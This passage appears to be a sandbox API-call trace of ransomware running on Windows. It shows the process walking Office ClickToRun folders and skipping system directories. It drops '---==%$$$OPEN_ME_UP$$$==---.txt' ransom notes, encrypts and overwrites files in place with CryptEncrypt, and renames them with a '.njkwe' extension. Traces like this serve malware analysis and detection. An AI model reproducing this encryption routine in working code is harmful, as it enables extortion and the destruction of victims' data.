returned 1 [0069.751] GetProcessHeap () returned 0xbe0000 [0069.751] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc16310 | out: hHeap=0xbe0000) returned 1 [0069.752] FindNextFileW (in: hFindFile=0xc19fe0, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x106db4bf, ftCreationTime.dwHighDateTime=0x1d327ce, ftLastAccessTime.dwLowDateTime=0x1141e67e, ftLastAccessTime.dwHighDateTime=0x1d327ce, ftLastWriteTime.dwLowDateTime=0x1141e67e, ftLastWriteTime.dwHighDateTime=0x1d327ce, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="A6A87302-92AE-41F2-AC52-73F5EE18259F", cAlternateFileName="A6A873~1")) returned 0 [0069.752] FindClose (in: hFindFile=0xc19fe0 | out: hFindFile=0xc19fe0) returned 1 [0069.752] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 87 [0069.752] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\programdata\\microsoft\\clicktorun\\productreleases\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0069.752] WriteFile (in: hFile=0x430, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x351, lpNumberOfBytesWritten=0x380f2dc, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x380f2dc*=0x351, lpOverlapped=0x0) returned 1 [0069.753] CloseHandle (hObject=0x430) returned 1 [0069.753] GetProcessHeap () returned 0xbe0000 [0069.753] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc29660 | out: hHeap=0xbe0000) returned 1 [0069.753] FindNextFileW (in: hFindFile=0xc1a320, lpFindFileData=0x380f598 | out: lpFindFileData=0x380f598*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x845f41a7, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x845f41a7, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x845f41a7, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="UserData", cAlternateFileName="")) returned 1 [0069.753] lstrcmpiW (lpString1="UserData", lpString2="Windows") returned -1 [0069.753] lstrcmpiW (lpString1="UserData", lpString2="$Recycle.bin") returned 1 [0069.753] lstrcmpiW (lpString1="UserData", lpString2="System Volume Information") returned 1 [0069.753] lstrcmpiW (lpString1="UserData", lpString2="Program Files") returned 1 [0069.753] lstrcmpiW (lpString1="UserData", lpString2="Program Files (x86)") returned 1 [0069.753] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\UserData") returned 48 [0069.753] lstrcmpW (lpString1="UserData", lpString2=".") returned 1 [0069.753] lstrcmpW (lpString1="UserData", lpString2="..") returned 1 [0069.753] lstrcmpW (lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\UserData", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0069.753] GetProcessHeap () returned 0xbe0000 [0069.753] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc29660 [0069.753] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\UserData\\*") returned 50 [0069.754] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\UserData\\*", lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x845f41a7, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x845f41a7, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x845f41a7, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0xc1a120 [0069.754] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0069.754] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0069.754] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0069.754] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0069.754] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0069.754] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\UserData\\.") returned 50 [0069.754] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0069.754] FindNextFileW (in: hFindFile=0xc1a120, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x845f41a7, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x845f41a7, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x845f41a7, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0069.754] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0069.754] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0069.754] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0069.754] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0069.754] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0069.754] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\UserData\\..") returned 51 [0069.754] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0069.754] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0069.754] FindNextFileW (in: hFindFile=0xc1a120, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x845f41a7, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x845f41a7, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x845f41a7, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 0 [0069.754] FindClose (in: hFindFile=0xc1a120 | out: hFindFile=0xc1a120) returned 1 [0069.754] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\UserData\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 80 [0069.754] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\UserData\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\programdata\\microsoft\\clicktorun\\userdata\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0069.755] WriteFile (in: hFile=0x430, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x351, lpNumberOfBytesWritten=0x380f2dc, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x380f2dc*=0x351, lpOverlapped=0x0) returned 1 [0069.756] CloseHandle (hObject=0x430) returned 1 [0069.756] GetProcessHeap () returned 0xbe0000 [0069.756] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc29660 | out: hHeap=0xbe0000) returned 1 [0069.756] FindNextFileW (in: hFindFile=0xc1a320, lpFindFileData=0x380f598 | out: lpFindFileData=0x380f598*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x49bee514, ftCreationTime.dwHighDateTime=0x1d32745, ftLastAccessTime.dwLowDateTime=0x3b87bb60, ftLastAccessTime.dwHighDateTime=0x1d47c34, ftLastWriteTime.dwLowDateTime=0x3b87bb60, ftLastWriteTime.dwHighDateTime=0x1d47c34, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="{9AC08E99-230B-47e8-9721-4577B7F124EA}", cAlternateFileName="{9AC08~1")) returned 1 [0069.756] lstrcmpiW (lpString1="{9AC08E99-230B-47e8-9721-4577B7F124EA}", lpString2="Windows") returned -1 [0069.756] lstrcmpiW (lpString1="{9AC08E99-230B-47e8-9721-4577B7F124EA}", lpString2="$Recycle.bin") returned 1 [0069.756] lstrcmpiW (lpString1="{9AC08E99-230B-47e8-9721-4577B7F124EA}", lpString2="System Volume Information") returned -1 [0069.756] lstrcmpiW (lpString1="{9AC08E99-230B-47e8-9721-4577B7F124EA}", lpString2="Program Files") returned -1 [0069.756] lstrcmpiW (lpString1="{9AC08E99-230B-47e8-9721-4577B7F124EA}", lpString2="Program Files (x86)") returned -1 [0069.756] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}") returned 78 [0069.756] lstrcmpW (lpString1="{9AC08E99-230B-47e8-9721-4577B7F124EA}", lpString2=".") returned 1 [0069.756] lstrcmpW (lpString1="{9AC08E99-230B-47e8-9721-4577B7F124EA}", lpString2="..") returned 1 [0069.756] lstrcmpW (lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0069.756] GetProcessHeap () returned 0xbe0000 [0069.756] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc29660 [0069.756] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\*") returned 80 [0069.756] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\*", lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x49bee514, ftCreationTime.dwHighDateTime=0x1d32745, ftLastAccessTime.dwLowDateTime=0x3b87bb60, ftLastAccessTime.dwHighDateTime=0x1d47c34, ftLastWriteTime.dwLowDateTime=0x3b87bb60, ftLastWriteTime.dwHighDateTime=0x1d47c34, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0xc1a1a0 [0069.758] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0069.758] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0069.759] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0069.759] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0069.759] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0069.759] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\.") returned 80 [0069.759] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0069.759] FindNextFileW (in: hFindFile=0xc1a1a0, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x49bee514, ftCreationTime.dwHighDateTime=0x1d32745, ftLastAccessTime.dwLowDateTime=0x3b87bb60, ftLastAccessTime.dwHighDateTime=0x1d47c34, ftLastWriteTime.dwLowDateTime=0x3b87bb60, ftLastWriteTime.dwHighDateTime=0x1d47c34, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0069.760] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0069.760] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0069.760] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0069.760] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0069.760] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0069.760] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\..") returned 81 [0069.760] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0069.760] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0069.760] FindNextFileW (in: hFindFile=0xc1a1a0, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x437adb83, ftCreationTime.dwHighDateTime=0x1d327e9, ftLastAccessTime.dwLowDateTime=0x437adb83, ftLastAccessTime.dwHighDateTime=0x1d327e9, ftLastWriteTime.dwLowDateTime=0x247ecc35, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x44e23, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="AirSpace.Etw.man", cAlternateFileName="AIRSPA~1.MAN")) returned 1 [0069.760] lstrcmpiW (lpString1="AirSpace.Etw.man", lpString2="Windows") returned -1 [0069.760] lstrcmpiW (lpString1="AirSpace.Etw.man", lpString2="$Recycle.bin") returned 1 [0069.760] lstrcmpiW (lpString1="AirSpace.Etw.man", lpString2="System Volume Information") returned -1 [0069.760] lstrcmpiW (lpString1="AirSpace.Etw.man", lpString2="Program Files") returned -1 [0069.760] lstrcmpiW (lpString1="AirSpace.Etw.man", lpString2="Program Files (x86)") returned -1 [0069.760] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\AirSpace.Etw.man") returned 95 [0069.760] StrStrIW (lpFirst="AirSpace.Etw.man", lpSrch=".njkwe") returned 0x0 [0069.760] lstrcmpW (lpString1="AirSpace.Etw.man", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0069.760] lstrcmpW (lpString1="AirSpace.Etw.man", lpString2="taridd") returned -1 [0069.760] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\AirSpace.Etw.man", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0069.760] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\AirSpace.Etw.man" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\airspace.etw.man"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x434 [0069.760] GetTickCount () returned 0x1151d0a [0069.760] GetTickCount () returned 0x1151d0a [0069.760] GetTickCount () returned 0x1151d0a [0069.761] GetTickCount () returned 0x1151d0a [0069.761] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f220*, pdwDataLen=0x380f2d0*=0x2c, dwBufLen=0x80 | out: pbData=0x380f220*, pdwDataLen=0x380f2d0*=0x80) returned 1 [0069.761] GetProcessHeap () returned 0xbe0000 [0069.761] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc4b838 [0069.774] ReadFile (in: hFile=0x434, lpBuffer=0xc4b838, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc4b838*, lpNumberOfBytesRead=0x380f2d4*=0x2800, lpOverlapped=0x0) returned 1 [0069.783] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0069.783] WriteFile (in: hFile=0x434, lpBuffer=0xc4b838*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc4b838*, lpNumberOfBytesWritten=0x380f2d4*=0x2800, lpOverlapped=0x0) returned 1 [0069.784] GetProcessHeap () returned 0xbe0000 [0069.784] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc4b838 | out: hHeap=0xbe0000) returned 1 [0069.784] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0069.784] WriteFile (in: hFile=0x434, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380f2d4*=0x300, lpOverlapped=0x0) returned 1 [0069.786] WriteFile (in: hFile=0x434, lpBuffer=0x380f220*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0x380f220*, lpNumberOfBytesWritten=0x380f2d4*=0x80, lpOverlapped=0x0) returned 1 [0069.786] WriteFile (in: hFile=0x434, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380f2d4*=0x4, lpOverlapped=0x0) returned 1 [0069.786] CloseHandle (hObject=0x434) returned 1 [0069.790] GetProcessHeap () returned 0xbe0000 [0069.790] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc16310 [0069.790] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\AirSpace.Etw.man_r00t_{3sXlE5}.njkwe") returned 115 [0069.790] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\AirSpace.Etw.man" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\airspace.etw.man"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\AirSpace.Etw.man_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\airspace.etw.man_r00t_{3sxle5}.njkwe")) returned 1 [0069.790] GetProcessHeap () returned 0xbe0000 [0069.790] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc16310 | out: hHeap=0xbe0000) returned 1 [0069.790] FindNextFileW (in: hFindFile=0xc1a1a0, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xed71c4aa, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xed71c4aa, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd2686ce0, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x91f0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="C2RManifest.Access.Access.x-none.msi.16.x-none.xml", cAlternateFileName="C25A45~1.XML")) returned 1 [0069.790] lstrcmpiW (lpString1="C2RManifest.Access.Access.x-none.msi.16.x-none.xml", lpString2="Windows") returned -1 [0069.790] lstrcmpiW (lpString1="C2RManifest.Access.Access.x-none.msi.16.x-none.xml", lpString2="$Recycle.bin") returned 1 [0069.790] lstrcmpiW (lpString1="C2RManifest.Access.Access.x-none.msi.16.x-none.xml", lpString2="System Volume Information") returned -1 [0069.790] lstrcmpiW (lpString1="C2RManifest.Access.Access.x-none.msi.16.x-none.xml", lpString2="Program Files") returned -1 [0069.790] lstrcmpiW (lpString1="C2RManifest.Access.Access.x-none.msi.16.x-none.xml", lpString2="Program Files (x86)") returned -1 [0069.790] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Access.Access.x-none.msi.16.x-none.xml") returned 129 [0069.790] StrStrIW (lpFirst="C2RManifest.Access.Access.x-none.msi.16.x-none.xml", lpSrch=".njkwe") returned 0x0 [0069.791] lstrcmpW (lpString1="C2RManifest.Access.Access.x-none.msi.16.x-none.xml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0069.791] lstrcmpW (lpString1="C2RManifest.Access.Access.x-none.msi.16.x-none.xml", lpString2="taridd") returned -1 [0069.791] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Access.Access.x-", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0069.791] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Access.Access.x-none.msi.16.x-none.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.access.access.x-none.msi.16.x-none.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x434 [0069.791] GetTickCount () returned 0x1151d29 [0069.791] GetTickCount () returned 0x1151d29 [0069.791] GetTickCount () returned 0x1151d29 [0069.791] GetTickCount () returned 0x1151d29 [0069.791] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f220*, pdwDataLen=0x380f2d0*=0x2c, dwBufLen=0x80 | out: pbData=0x380f220*, pdwDataLen=0x380f2d0*=0x80) returned 1 [0069.791] GetProcessHeap () returned 0xbe0000 [0069.791] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc4b838 [0069.791] ReadFile (in: hFile=0x434, lpBuffer=0xc4b838, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc4b838*, lpNumberOfBytesRead=0x380f2d4*=0x2800, lpOverlapped=0x0) returned 1 [0069.933] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0069.933] WriteFile (in: hFile=0x434, lpBuffer=0xc4b838*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc4b838*, lpNumberOfBytesWritten=0x380f2d4*=0x2800, lpOverlapped=0x0) returned 1 [0069.934] GetProcessHeap () returned 0xbe0000 [0069.934] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc4b838 | out: hHeap=0xbe0000) returned 1 [0069.934] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0069.934] WriteFile (in: hFile=0x434, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380f2d4*=0x300, lpOverlapped=0x0) returned 1 [0069.934] WriteFile (in: hFile=0x434, lpBuffer=0x380f220*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0x380f220*, lpNumberOfBytesWritten=0x380f2d4*=0x80, lpOverlapped=0x0) returned 1 [0069.934] WriteFile (in: hFile=0x434, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380f2d4*=0x4, lpOverlapped=0x0) returned 1 [0069.935] CloseHandle (hObject=0x434) returned 1 [0069.935] GetProcessHeap () returned 0xbe0000 [0069.935] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc16310 [0069.935] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Access.Access.x-none.msi.16.x-none.xml_r00t_{3sXlE5}.njkwe") returned 149 [0069.935] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Access.Access.x-none.msi.16.x-none.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.access.access.x-none.msi.16.x-none.xml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Access.Access.x-none.msi.16.x-none.xml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.access.access.x-none.msi.16.x-none.xml_r00t_{3sxle5}.njkwe")) returned 1 [0069.937] GetProcessHeap () returned 0xbe0000 [0069.937] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc16310 | out: hHeap=0xbe0000) returned 1 [0069.937] FindNextFileW (in: hFindFile=0xc1a1a0, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xed71c4aa, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xed71c4aa, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd356d87a, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xe71c, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="C2RManifest.accessmui.msi.16.en-us.xml", cAlternateFileName="C222C2~1.XML")) returned 1 [0069.937] lstrcmpiW (lpString1="C2RManifest.accessmui.msi.16.en-us.xml", lpString2="Windows") returned -1 [0069.937] lstrcmpiW (lpString1="C2RManifest.accessmui.msi.16.en-us.xml", lpString2="$Recycle.bin") returned 1 [0069.937] lstrcmpiW (lpString1="C2RManifest.accessmui.msi.16.en-us.xml", lpString2="System Volume Information") returned -1 [0069.937] lstrcmpiW (lpString1="C2RManifest.accessmui.msi.16.en-us.xml", lpString2="Program Files") returned -1 [0069.937] lstrcmpiW (lpString1="C2RManifest.accessmui.msi.16.en-us.xml", lpString2="Program Files (x86)") returned -1 [0069.937] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.accessmui.msi.16.en-us.xml") returned 117 [0069.937] StrStrIW (lpFirst="C2RManifest.accessmui.msi.16.en-us.xml", lpSrch=".njkwe") returned 0x0 [0069.937] lstrcmpW (lpString1="C2RManifest.accessmui.msi.16.en-us.xml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0069.937] lstrcmpW (lpString1="C2RManifest.accessmui.msi.16.en-us.xml", 